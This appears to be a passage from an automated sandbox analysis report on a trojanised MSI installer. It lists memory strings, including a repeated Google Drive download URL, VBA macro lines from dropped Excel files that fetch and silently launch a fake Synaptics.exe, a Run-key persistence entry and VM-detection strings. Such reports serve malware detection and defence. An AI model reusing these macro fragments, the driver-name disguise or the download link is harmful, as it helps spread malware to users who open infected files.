                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_/Dri
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada6g
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadciscoKI
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadconte
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuritG
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#f
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#ffu
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddRt9s
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddir=l
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddsour
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeI
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfo
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.c
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadinfo.d
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir=lt
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado563
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoads.
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorm-f
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp/cspP
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpis.c
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:390px;min-height:180px;
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtrRAz3
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~

                          System Summary

                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: 13zKLTpU.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: AFWAAFRXKO.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: 13zKLTpU.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: AFWAAFRXKO.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: 13zKLTpU.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: AFWAAFRXKO.xlsm.4.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\63d57e.msi
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID6D6.tmp
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID754.tmp
                          Source: C:\Windows\Installer\MSID754.tmp | File created: C:\Windows\SysWOW64\._cache_MSID754.tmp
                          Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSID754.tmp
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: 13zKLTpU.xlsm.4.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: AFWAAFRXKO.xlsm.4.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: Joe Sandbox View | Dropped File: C:\ProgramData\Synaptics\RCXDBF7.tmp 2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                          Source: Joe Sandbox View | Dropped File: C:\Users\user\Documents\~$cache1 2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728
                          Source: MSID754.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                          Source: MSID754.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                          Source: Synaptics.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXDBF7.tmp.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ~$cache1.4.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: xyxmml.msi | Binary or memory string: OriginalFileName vs xyxmml.msi
                          Source: xyxmml.msi | Binary or memory string: OriginalFilenameb! vs xyxmml.msi
                          Source: classification engine | Classification label: mal100.troj.expl.evad.winMSI@11/42@4/3
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\CMLD753.tmp
                          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1360
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFE59441C0F7560F9F.TMP
                          Source: Yara match | File source: xyxmml.msi, type: SAMPLE
                          Source: Yara match | File source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara match | File source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara match | File source: C:\Windows\Installer\MSID754.tmp, type: DROPPED
                          Source: C:\Windows\Installer\MSID754.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Windows\Installer\MSID754.tmp | File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Windows\Installer\MSID754.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: xyxmml.msi | ReversingLabs: Detection: 65%
                          Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi"
                          Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                          Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSID754.tmp "C:\Windows\Installer\MSID754.tmp"
                          Source: C:\Windows\Installer\MSID754.tmp | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: unknown | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Windows\Installer\MSID754.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | File written: C:\Users\user\AppData\Local\Temp\5UJEwdq.ini
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: xyxmml.msi | Static file information: File size 1757184 > 1048576
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                          Source: initial sample | Static PE information: section name: UPX0
                          Source: initial sample | Static PE information: section name: UPX1

                          Persistence and Installation Behavior

                          Source: C:\ProgramData\Synaptics\Synaptics.exe, File created: C:\Users\user\Documents\~$cache1
                          Source: C:\Windows\System32\msiexec.exe, Executable created and started: C:\Windows\Installer\MSID754.tmp
                          Source: C:\Windows\System32\msiexec.exe, File created: C:\Windows\Installer\MSID754.tmp
                          Source: C:\Windows\Installer\MSID754.tmp, File created: C:\ProgramData\Synaptics\Synaptics.exe
                          Source: C:\Windows\Installer\MSID754.tmp, File created: C:\Windows\SysWOW64\._cache_MSID754.tmp
                          Source: C:\Windows\Installer\MSID754.tmp, File created: C:\ProgramData\Synaptics\RCXDBF7.tmp
                          Source: C:\Windows\Installer\MSID754.tmp, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                          Source: C:\Windows\System32\msiexec.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\msiexec.exe, Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\Installer\MSID754.tmp, Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\Installer\MSID754.tmp, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exe, Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\Installer\MSID754.tmp, Dropped PE file which has not been started: C:\Windows\SysWOW64\._cache_MSID754.tmp
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7228, Thread sleep time: -420000s >= -30000s
                          Source: C:\Windows\splwow64.exe, Last function: Thread delayed
                          Source: C:\Windows\System32\msiexec.exe, File Volume queried: C:\ FullSizeInformation
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Thread delayed: delay time: 60000
                          Source: C:\Windows\splwow64.exe, Thread delayed: delay time: 120000
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user\AppData\Roaming
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user\AppData
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                          Source: C:\Windows\Installer\MSID754.tmp, File opened: C:\Users\user
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.12.dr, Binary or memory string: vmci.syshbin
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware, Inc.
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.12.dr, Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.12.dr, Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.12.dr, Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
                          Source: Amcache.hve.12.dr, Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.dr, Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.12.dr, Binary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.12.dr, Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.12.dr, Binary or memory string: vmci.sys
                          Source: Amcache.hve.12.dr, Binary or memory string: vmci.syshbin`
                          Source: Amcache.hve.12.dr, Binary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.12.dr, Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware20,1
                          Source: Amcache.hve.12.dr, Binary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.12.dr, Binary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                          Source: Amcache.hve.12.dr, Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.12.dr, Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.12.dr, Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware PCI VMCI Bus Device
